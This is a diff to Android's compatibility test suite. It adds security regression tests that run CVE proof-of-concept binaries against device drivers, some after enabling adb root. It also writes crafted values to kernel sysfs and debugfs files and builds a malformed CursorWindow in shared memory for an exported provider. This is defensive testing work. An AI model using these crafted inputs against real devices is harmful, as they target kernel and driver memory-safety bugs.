+ public static String runPoc(String pocName, ITestDevice device, int timeout) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ CollectingOutputReceiver receiver = new CollectingOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout, TimeUnit.SECONDS, 0);
+ String output = receiver.getOutput();
+ return output;
}
/**
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_10.java b/hostsidetests/security/src/android/security/cts/Poc16_10.java
new file mode 100644
index 0000000..d04ebea
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_10.java
@@ -0,0 +1,107 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_10 extends SecurityTestCase {
+
+ /**
+ * b/30904789
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6730() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906023
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6731() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906599
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6732() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906694
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6733() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907120
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6734() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907701
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6735() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30953284
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6736() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
+ }
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
new file mode 100644
index 0000000..a6160d5
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -0,0 +1,258 @@
+/**
+0;256;0c * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_12 extends SecurityTestCase {
+
+ //Criticals
+ /**
+ * b/31606947
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8424() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8424", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31797770
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8425() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799206
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8426() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799885
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8427() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
+ containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31993456
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8428() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32160775
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32225180
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8430() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32402179
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8431() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32447738
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8432() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32125137
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8434() throws Exception {
+ if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+ AdbUtils.runPoc("CVE-2016-8434", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32700935
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8435() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8435", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31568617
+ */
+ @SecurityTest
+ public void testPocCVE_2016_9120() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ion")) {
+ AdbUtils.runPoc("CVE-2016-9120", getDevice(), 60);
+ }
+ }
+
+ //Highs
+ /**
+ * b/31225246
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8412() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev7")) {
+ AdbUtils.runPoc("CVE-2016-8412", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31243641
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8444() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev17")) {
+ AdbUtils.runPoc("CVE-2016-8444", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31791148
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8448() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2016-8448", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31798848
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8449() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/tegra_avpchannel")) {
+ AdbUtils.runPoc("CVE-2016-8449", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31668540
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8460() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
+ assertTrue(!result.equals("Vulnerable"));
+ }
+ }
+
+ /**
+ * b/32402548
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0403() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0403", getDevice(), 60);
+ }
+
+ /**
+ * b/32510733
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0404() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/proc/asound/version")) {
+ AdbUtils.runPoc("CVE-2017-0404", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32178033
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8451() throws Exception {
+ enableAdbRoot(getDevice());
+ String command =
+ "echo AAAAAAAAA > /sys/devices/f9924000.i2c/i2c-2/2-0070/power_control";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+
+ /**
+ * b/32659848
+ */
+ @SecurityTest
+ public void testPoc32659848() throws Exception {
+ String command =
+ "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
new file mode 100644
index 0000000..f8ed22a
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -0,0 +1,44 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_01 extends SecurityTestCase {
+
+ /**
+ * b/31799863
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8482() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32636619
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-as-gpu")) {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0429", getDevice(), 60);
+ }
+ }
+ }
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index b6599c1..5c84850 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -64,6 +64,17 @@
}
/**
+ * Check if a driver is present on a machine
+ */
+ public boolean containsDriver(ITestDevice mDevice, String driver) throws Exception {
+ String result = mDevice.executeShellCommand("ls -Zl " + driver);
+ if(result.contains("No such file or directory")) {
+ return false;
+ }
+ return true;
+ }
+
+ /**
* Makes sure the phone is online, and the ensure the current boottime is within 2 seconds
* (due to rounding) of the previous boottime to check if The phone has crashed.
*/
diff --git a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java
index 86e7b6c..773584e 100644
--- a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java
+++ b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java
@@ -83,8 +83,7 @@
launchActivityInDockStack(LAUNCHING_ACTIVITY);
mAmWmState.computeState(mDevice, new String[] {LAUNCHING_ACTIVITY});
launchActivityToSide();
- mAmWmState.computeState(mDevice, new String[] {LAUNCHING_ACTIVITY, TEST_ACTIVITY_NAME});
-
+ mAmWmState.computeState(mDevice, new String[] {TEST_ACTIVITY_NAME});
mAmWmState.assertContainsStack(
"Must contain fullscreen stack.", FULLSCREEN_WORKSPACE_STACK_ID);
mAmWmState.assertContainsStack("Must contain docked stack.", DOCKED_STACK_ID);
@@ -138,7 +137,6 @@
launchActivityInDockStack(LAUNCHING_ACTIVITY);
mAmWmState.computeState(mDevice, new String[] {LAUNCHING_ACTIVITY});
-
final String[] waitForActivitiesVisible =
new String[] {TEST_ACTIVITY_NAME, LAUNCHING_ACTIVITY};
@@ -377,7 +375,6 @@
CLog.logAndDisplay(LogLevel.INFO, "Skipping test: no multi-window support");
return;
}
-
final String[] waitTestActivityName = new String[] {TEST_ACTIVITY_NAME};
executeShellCommand(getAmStartCmd(TEST_ACTIVITY_NAME));
mAmWmState.computeState(mDevice, waitTestActivityName);
diff --git a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
index f307ecc..fa1ae69 100644
--- a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
+++ b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
@@ -23,7 +23,6 @@
import java.util.HashMap;
import java.util.Map;
-import java.util.regex.Pattern;
public class CrossAppDragAndDropTests extends DeviceTestCase {
// Constants copied from ActivityManager.StackId. If they are changed there, these must be
@@ -42,24 +41,19 @@
private static final String AM_FORCE_STOP = "am force-stop ";
private static final String AM_MOVE_TASK = "am stack movetask ";
- private static final String AM_RESIZE_TASK = "am task resize ";
private static final String AM_REMOVE_STACK = "am stack remove ";
private static final String AM_START_N = "am start -n ";
private static final String AM_STACK_LIST = "am stack list";
private static final String INPUT_MOUSE_SWIPE = "input mouse swipe ";
private static final String TASK_ID_PREFIX = "taskId";
- // Regex pattern to match adb shell am stack list output of the form:
- // taskId=<TASK_ID>: <componentName> bounds=[LEFT,TOP][RIGHT,BOTTOM]
- private static final String TASK_REGEX_PATTERN_STRING =
- "taskId=[0-9]+: %s bounds=\\[[0-9]+,[0-9]+\\]\\[[0-9]+,[0-9]+\\]";
-
private static final int SWIPE_DURATION_MS = 500;
private static final String SOURCE_PACKAGE_NAME = "android.wm.cts.dndsourceapp";
private static final String TARGET_PACKAGE_NAME = "android.wm.cts.dndtargetapp";
private static final String TARGET_23_PACKAGE_NAME = "android.wm.cts.dndtargetappsdk23";
+
private static final String SOURCE_ACTIVITY_NAME = "DragSource";
private static final String TARGET_ACTIVITY_NAME = "DropTarget";
@@ -88,9 +82,6 @@
private static final String RESULT_EXCEPTION = "Exception";
private static final String RESULT_NULL_DROP_PERMISSIONS = "Null DragAndDropPermissions";
- private static final String AM_SUPPORTS_SPLIT_SCREEN_MULTIWINDOW =
- "am supports-split-screen-multiwindow";
-
private ITestDevice mDevice;
private Map<String, String> mResults;
@@ -103,6 +94,7 @@
super.setUp();
mDevice = getDevice();
+
if (!supportsDragAndDrop()) {
return;
}
@@ -139,12 +131,6 @@
return AM_MOVE_TASK + taskId + " " + stackId + " true";
}
- private String getResizeTaskCommand(int taskId, Point topLeft, Point bottomRight)
- throws Exception {
- return AM_RESIZE_TASK + taskId + " " + topLeft.x + " " + topLeft.y + " " + bottomRight.x
- + " " + bottomRight.y;
- }
-
private String getComponentName(String packageName, String activityName) {
return packageName + "/" + packageName + "." + activityName;
}
@@ -195,24 +181,6 @@
waitForResume(packageName, activityName);
}
- /**
- * @param displaySize size of the display
- * @param leftSide {@code true} to launch the app taking up the left half of the display,
- * {@code false} to launch the app taking up the right half of the display.
- */
- private void launchFreeformActivity(String packageName, String activityName, String mode,
- Point displaySize, boolean leftSide) throws Exception{
- clearLogs();
- final String componentName = getComponentName(packageName, activityName);
- executeShellCommand(getStartCommand(componentName, mode) + " --stack "
- + FREEFORM_WORKSPACE_STACK_ID);
- waitForResume(packageName, activityName);
- Point topLeft = new Point(leftSide ? 0 : displaySize.x / 2, 0);
- Point bottomRight = new Point(leftSide ? displaySize.x / 2 : displaySize.x, displaySize.y);
- executeShellCommand(getResizeTaskCommand(getActivityTaskId(componentName), topLeft,
- bottomRight));
- }
-
private void waitForResume(String packageName, String activityName) throws Exception {
final String fullActivityName = packageName + "." + activityName;
int retryCount = 3;
@@ -250,9 +218,8 @@
CollectingOutputReceiver outputReceiver = new CollectingOutputReceiver();
mDevice.executeShellCommand(AM_STACK_LIST, outputReceiver);
final String output = outputReceiver.getOutput();
- final Pattern pattern = Pattern.compile(String.format(TASK_REGEX_PATTERN_STRING, name));
for (String line : output.split("\\n")) {
- if (pattern.matcher(line).find()) {
+ if (line.contains(name)) {
return line;
}
}
@@ -285,12 +252,6 @@
return -1;
}
- private Point getDisplaySize() throws Exception {
- final String output = executeShellCommand("wm size");
- final String[] sizes = output.split(" ")[2].split("x");
- return new Point(Integer.valueOf(sizes[0].trim()), Integer.valueOf(sizes[1].trim()));
- }
-
private Point getWindowCenter(String name) throws Exception {
Point p1 = new Point();
Point p2 = new Point();
@@ -335,30 +296,14 @@
return output;
}
- /**
- * @return {@code true} if the device supports a certain multi-window mode that allows the
- * test to run, {@code false} if it does not and the test should be skipped.
- */
- private boolean doTestDragAndDrop(String sourceMode, String targetMode,
- String expectedDropResult)
+ private void doTestDragAndDrop(String sourceMode, String targetMode, String expectedDropResult)
throws Exception {
if (!supportsDragAndDrop()) {
- return false;
+ return;
}
- if (supportsSplitScreenMultiWindow()) {
- launchDockedActivity(mSourcePackageName, SOURCE_ACTIVITY_NAME, sourceMode);
- launchFullscreenActivity(mTargetPackageName, TARGET_ACTIVITY_NAME, targetMode);
- } else if (supportsFreeformMultiWindow()) {
- // Fallback to try to launch two freeform windows side by side.
- Point displaySize = getDisplaySize();
- launchFreeformActivity(mSourcePackageName, SOURCE_ACTIVITY_NAME, sourceMode,
- displaySize, true /* leftSide */);
- launchFreeformActivity(mTargetPackageName, TARGET_ACTIVITY_NAME, targetMode,
- displaySize, false /* leftSide */);
- } else {
- return false;
- }
+ launchDockedActivity(mSourcePackageName, SOURCE_ACTIVITY_NAME, sourceMode);
+ launchFullscreenActivity(mTargetPackageName, TARGET_ACTIVITY_NAME, targetMode);
clearLogs();
@@ -369,7 +314,6 @@
mResults = getLogResults(TARGET_LOG_TAG);
assertResult(RESULT_KEY_DROP_RESULT, expectedDropResult);
- return true;
}
private void assertResult(String resultKey, String expectedResult) throws Exception {
@@ -388,45 +332,36 @@
}
private boolean supportsDragAndDrop() throws Exception {
- // Do not run this test on watches.
- return !mDevice.hasFeature("feature:android.hardware.type.watch");
- }
-
- private boolean supportsSplitScreenMultiWindow() throws DeviceNotAvailableException {
- return !executeShellCommand(AM_SUPPORTS_SPLIT_SCREEN_MULTIWINDOW).startsWith("false");
- }
-
- private boolean supportsFreeformMultiWindow() throws DeviceNotAvailableException {
- return mDevice.hasFeature("feature:android.software.freeform_window_management");
+ String supportsMultiwindow = mDevice.executeShellCommand("am supports-multiwindow").trim();
+ if ("true".equals(supportsMultiwindow)) {
+ return true;
+ } else if ("false".equals(supportsMultiwindow)) {
+ return false;
+ } else {
+ throw new Exception(
+ "device does not support \"am supports-multiwindow\" shell command.");
+ }
}
public void testCancelSoon() throws Exception {
- if (!doTestDragAndDrop(CANCEL_SOON, REQUEST_NONE, null)) {
- return;
- }
+ doTestDragAndDrop(CANCEL_SOON, REQUEST_NONE, null);
assertResult(RESULT_KEY_DRAG_STARTED, RESULT_OK);
assertResult(RESULT_KEY_EXTRAS, RESULT_OK);
}
public void testDisallowGlobal() throws Exception {
- if (!doTestDragAndDrop(DISALLOW_GLOBAL, REQUEST_NONE, null)) {
- return;
- }
+ doTestDragAndDrop(DISALLOW_GLOBAL, REQUEST_NONE, null);
assertResult(RESULT_KEY_DRAG_STARTED, null);
}
public void testDisallowGlobalBelowSdk24() throws Exception {
mTargetPackageName = TARGET_23_PACKAGE_NAME;
- if (!doTestDragAndDrop(GRANT_NONE, REQUEST_NONE, null)) {
- return;
- }
+ doTestDragAndDrop(GRANT_NONE, REQUEST_NONE, null);
assertResult(RESULT_KEY_DRAG_STARTED, null);
}
public void testGrantNoneRequestNone() throws Exception {
- if (!doTestDragAndDrop(GRANT_NONE, REQUEST_NONE, RESULT_EXCEPTION)) {
- return;
- }
+ doTestDragAndDrop(GRANT_NONE, REQUEST_NONE, RESULT_EXCEPTION);
assertResult(RESULT_KEY_DRAG_STARTED, RESULT_OK);
assertResult(RESULT_KEY_EXTRAS, RESULT_OK);
}
diff --git a/hostsidetests/sustainedperf/src/android/SustainedPerformance/cts/SustainedPerformanceHostTest.java b/hostsidetests/sustainedperf/src/android/SustainedPerformance/cts/SustainedPerformanceHostTest.java
index 702b15b..fffeeb8 100644
--- a/hostsidetests/sustainedperf/src/android/SustainedPerformance/cts/SustainedPerformanceHostTest.java
+++ b/hostsidetests/sustainedperf/src/android/SustainedPerformance/cts/SustainedPerformanceHostTest.java
@@ -219,21 +219,12 @@
device.executeShellCommand("settings put global airplane_mode_on 0");
device.executeShellCommand("am broadcast -a android.intent.action.AIRPLANE_MODE --ez state false");
- double resDhry = dhrystoneResultsWithMode.get(2);
- double resApp = appResultsWithMode.get(2);
-
- /* Report if performance is below 5% margin for both dhrystone and shader */
- if ((resDhry > 5) || (resApp > 5)) {
- Log.w("SustainedPerformanceHostTests",
- "Sustainable mode results, Dhrystone: " + resDhry + " App: " + resApp);
- }
-
/*
- * Error if the performance in the mode is not consistent with
+ * Checks if the performance in the mode is consistent with
* 5% error margin for shader and 10% error margin for dhrystone.
*/
assertFalse("Results in the mode are not sustainable",
- (resDhry > 15) ||
- (resApp > 5));
+ (dhrystoneResultsWithMode.get(2) > 10) ||
+ (appResultsWithMode.get(2)) > 5);
}
}
diff --git a/tests/app/src/android/app/cts/SearchManagerTest.java b/tests/app/src/android/app/cts/SearchManagerTest.java
index b1b5623..bf7e2f9 100644
--- a/tests/app/src/android/app/cts/SearchManagerTest.java
+++ b/tests/app/src/android/app/cts/SearchManagerTest.java
@@ -17,10 +17,12 @@
package android.app.cts;
import android.app.SearchManager;
+import android.app.UiModeManager;
import android.app.stubs.CTSActivityTestCaseBase;
import android.app.stubs.SearchManagerStubActivity;
import android.content.Context;
import android.content.Intent;
+import android.content.res.Configuration;
public class SearchManagerTest extends CTSActivityTestCaseBase {
@@ -61,6 +63,10 @@
private boolean hasGlobalSearchActivity() {
Context context = getInstrumentation().getTargetContext();
+ UiModeManager uiModeManager = context.getSystemService(UiModeManager.class);
+ if (uiModeManager.getCurrentModeType() == Configuration.UI_MODE_TYPE_TELEVISION) {
+ return false;
+ }
SearchManager searchManager =
(SearchManager) context.getSystemService(Context.SEARCH_SERVICE);
if (searchManager == null) {
diff --git a/tests/tests/content/Android.mk b/tests/tests/content/Android.mk
index d901926..98d067a 100644
--- a/tests/tests/content/Android.mk
+++ b/tests/tests/content/Android.mk
@@ -21,6 +21,8 @@
# and when built explicitly put it in the data partition
LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+LOCAL_JNI_SHARED_LIBRARIES := libnativecursorwindow_jni libnativehelper_compat_libc++
+
LOCAL_JAVA_LIBRARIES := android.test.runner
LOCAL_STATIC_JAVA_LIBRARIES := android-support-v4 \
@@ -46,3 +48,5 @@
LOCAL_COMPATIBILITY_SUITE := cts
include $(BUILD_CTS_PACKAGE)
+
+include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/content/AndroidManifest.xml b/tests/tests/content/AndroidManifest.xml
index d4f203e..040eafa 100644
--- a/tests/tests/content/AndroidManifest.xml
+++ b/tests/tests/content/AndroidManifest.xml
@@ -219,6 +219,13 @@
</intent-filter>
</activity>
+ <provider
+ android:name="android.content.cts.CursorWindowContentProvider"
+ android:authorities="cursorwindow.provider"
+ android:exported="true"
+ android:process=":providerProcess">
+ </provider>
+
</application>
<instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/content/jni/Android.mk b/tests/tests/content/jni/Android.mk
new file mode 100644
index 0000000..4737b35
--- /dev/null
+++ b/tests/tests/content/jni/Android.mk
@@ -0,0 +1,30 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH:= $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := libnativecursorwindow_jni
+
+# Don't include this package in any configuration by default.
+LOCAL_MODULE_TAGS := optional
+
+LOCAL_SRC_FILES := NativeCursorWindow.c
+
+LOCAL_C_INCLUDES := $(JNI_H_INCLUDE)
+
+LOCAL_SHARED_LIBRARIES := libnativehelper_compat_libc++ liblog
+LOCAL_CXX_STL := libc++_static
+include $(BUILD_SHARED_LIBRARY)
diff --git a/tests/tests/content/jni/NativeCursorWindow.c b/tests/tests/content/jni/NativeCursorWindow.c
new file mode 100644
index 0000000..a2fb92a
--- /dev/null
+++ b/tests/tests/content/jni/NativeCursorWindow.c
@@ -0,0 +1,99 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define LOG_TAG "NativeCursorWindow"
+
+#include <jni.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <linux/ashmem.h>
+#include <utils/Log.h>
+
+struct Header {
+ // Offset of the lowest unused byte in the window.
+ uint32_t freeOffset;
+
+ // Offset of the first row slot chunk.
+ uint32_t firstChunkOffset;
+
+ uint32_t numRows;
+ uint32_t numColumns;
+};
+
+struct RowSlot {
+ uint32_t offset;
+};
+
+#define ROW_SLOT_CHUNK_NUM_ROWS 100
+
+struct RowSlotChunk {
+ struct RowSlot slots[ROW_SLOT_CHUNK_NUM_ROWS];
+ uint32_t nextChunkOffset;
+};
+
+/* Field types. */
+enum {
+ FIELD_TYPE_NULL = 0,
+ FIELD_TYPE_INTEGER = 1,
+ FIELD_TYPE_FLOAT = 2,
+ FIELD_TYPE_STRING = 3,
+ FIELD_TYPE_BLOB = 4,
+};
+
+/* Opaque type that describes a field slot. */
+struct FieldSlot {
+ int32_t type;
+ union {
+ double d;
+ int64_t l;
+ struct {
+ uint32_t offset;
+ uint32_t size;
+ } buffer;
+ } data;
+} __attribute((packed));
+
+JNIEXPORT jint JNICALL
+Java_android_content_cts_CursorWindowContentProvider_makeNativeCursorWindowFd(JNIEnv *env, jclass clazz,
+jint offset, jint size, jboolean isBlob) {
+ int fd = open("/dev/ashmem", O_RDWR);
+ ioctl(fd, ASHMEM_SET_NAME, "Fake CursorWindow");
+
+ ioctl(fd, ASHMEM_SET_SIZE, 1024);
+
+ void *data = mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+ struct Header *header = (struct Header *) data;
+ unsigned rowSlotChunkOffset = sizeof(struct Header);
+ struct RowSlotChunk *rowSlotChunk = (struct RowSlotChunk *)(data + rowSlotChunkOffset);
+ unsigned fieldSlotOffset = rowSlotChunkOffset + sizeof(struct RowSlotChunk);
+ struct FieldSlot *fieldSlot = (struct FieldSlot *) (data + fieldSlotOffset);
+
+ header->numRows = 1;
+ header->numColumns = 1;
+ header->firstChunkOffset = rowSlotChunkOffset;
+
+ rowSlotChunk->slots[0].offset = fieldSlotOffset;
+
+ fieldSlot->type = isBlob ? FIELD_TYPE_BLOB : FIELD_TYPE_STRING;
+ fieldSlot->data.buffer.offset = offset;
+ fieldSlot->data.buffer.size = size;
+
+ munmap(data, 1024);
+
+ return fd;
+
+}
